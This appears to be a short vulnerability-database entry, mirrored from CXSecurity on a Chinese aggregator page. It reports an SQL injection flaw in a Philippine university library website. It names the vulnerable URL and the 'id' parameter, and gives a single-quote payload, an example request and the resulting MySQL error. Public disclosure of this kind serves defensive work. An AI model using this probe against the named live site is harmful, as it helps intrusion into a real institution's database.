aup.edu.ph SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1535491 漏洞类型
发布时间 2019-03-15 更新时间 2019-03-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019030124
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Vulnerable URL: http://jldmlibrary.aup.edu.ph/articles.php

Type: GET

Parameter: id

Payload: '

Example: http://jldmlibrary.aup.edu.ph/articles.php?id=%27

Generates following: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by date_post DESC' at line 1